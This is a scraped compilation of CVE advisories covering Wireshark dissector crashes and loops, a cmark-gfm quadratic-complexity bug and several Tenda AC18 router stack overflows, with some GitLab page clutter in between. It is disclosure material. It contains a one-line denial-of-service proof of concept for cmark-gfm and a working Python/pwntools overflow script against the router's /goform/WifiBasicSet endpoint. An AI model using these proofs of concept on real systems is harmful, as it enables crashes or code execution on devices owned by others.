Memory leak in the NFS dissector in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file

wnpa-sec-2023-02 · NFS dissector memory leak

**Summary**

**Name:** NFS dissector memory leak

**Docid:** wnpa-sec-2023-02

**Date:** January 18, 2023

**Affected versions:** 4.0.0 to 4.0.2, 3.6.0 to 3.6.10

**Fixed versions:** 4.0.3, 3.6.11

**References:**  
Wireshark issue 18628

**Details****Description**

The NFS dissector could leak memory.

**Impact**

It may be possible to make Wireshark consume excessive CPU resources by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 4.0.3, 3.6.11 or later.

CVE-2023-0417: Wireshark · wnpa-sec-2023-02 · NFS dissector memory leak

Crash in the EAP dissector in Wireshark 4.0.0 to 4.0.2 allows denial of service via packet injection or crafted capture file

wnpa-sec-2023-01 · EAP dissector crash

**Summary**

**Name:** EAP dissector crash

**Docid:** wnpa-sec-2023-01

**Date:** January 18, 2023

**Affected versions:** 4.0.0 to 4.0.2

**Fixed versions:** 4.0.3

**References:**  
Wireshark issue 18622

**Details****Description**

The EAP dissector could crash.

**Impact**

It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 4.0.3 or later.

CVE-2023-0414: Wireshark · wnpa-sec-2023-01 · EAP dissector crash

Excessive loops in multiple dissectors in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file

wnpa-sec-2023-06 · Multiple dissector excessive loops

**Summary**

**Name:** Multiple dissector excessive loops

**Docid:** wnpa-sec-2023-06

**Date:** January 18, 2023

**Affected versions:** 4.0.0 to 4.0.2, 3.6.0 to 3.6.10

**Fixed versions:** 4.0.3, 3.6.11

**References:**  
Wireshark issue 18711  
Wireshark issue 18720  
Wireshark issue 18737

**Details****Description**

The BPv6, NCP, and RTPS dissectors could loop excessively.

**Impact**

It may be possible to make Wireshark consume excessive CPU resources by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 4.0.3, 3.6.11 or later.

CVE-2023-0411: Wireshark · wnpa-sec-2023-06 · Multiple dissector excessive loops

Dissection engine bug in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Sign up now
*   Login
*   Sign in / Register
    

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0413.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 2 new advisories · 8429119a
    
    🤖 GitLab Bot 🤖 authored Jan 20, 2023
    
    8429119a

CVE-2023-0413: 2023/CVE-2023-0413.json · master · GitLab.org / cves · GitLab

GNW dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file

CVE-2023-0416: Fuzz job crash output: fuzz-2023-01-03-10777.pcap (#18779) · Issues · Wireshark Foundation / wireshark · GitLab

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. Versions prior to 0.29.0.gfm.7 contain a polynomial time complexity issue in handle_close_bracket that may lead to unbounded resource exhaustion and subsequent denial of service. This vulnerability has been patched in 0.29.0.gfm.7.

**Impact**

A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service.

**Proof of concept**

python3 -c 'print("!\[\[\]()" \* 10000)' | cmark-gfm

Increasing the number 10000 in the above command causes the running time to increase quadratically.

**Patches**

This vulnerability has been patched in 0.29.0.gfm.7.

**Note on cmark and cmark-gfm**

cmark-gfm is a fork of cmark that adds the GitHub Flavored Markdown extensions. The two codebases have diverged over time, but share a common core. This bug affects both codebases. We would like to thank @jgm for his help with fixing and disclosing this bug.

**Credit**

We would like to thank @jgm for implementing the fix for this bug.

**References**

https://en.wikipedia.org/wiki/Time\_complexity

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in github/cmark-gfm

CVE-2023-22486: Quadratic complexity bug in handle_close_bracket may lead to a denial of service

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.

****CVE-2023-24166****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

import requests
from pwn import \*

url \= 'http://x.x.x.x/goform/WifiBasicSet'
pl \= 'a'\*564+p32(0xdeadbeef)
data \= {'security\_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid\_5g':'1', 'ssid\_5g':'1', 'wrlPwd\_5g': '1'}

requests.post(url, data\=data)

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24166: Tenda/2.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_000c2318.

****CVE-2023-24164****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "FUN\_000c2318" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24164: Tenda/4.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/initIpAddrInfo.

****CVE-2023-24165****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

AC18升级软件\_腾达(Tenda)官方网站

****3\. Vulnerability details****

The function "initIpAddrInfo" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24165: Tenda/7.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_0007343c.

****CVE-2023-24169****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "FUN\_0007343c" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

Tag

#dos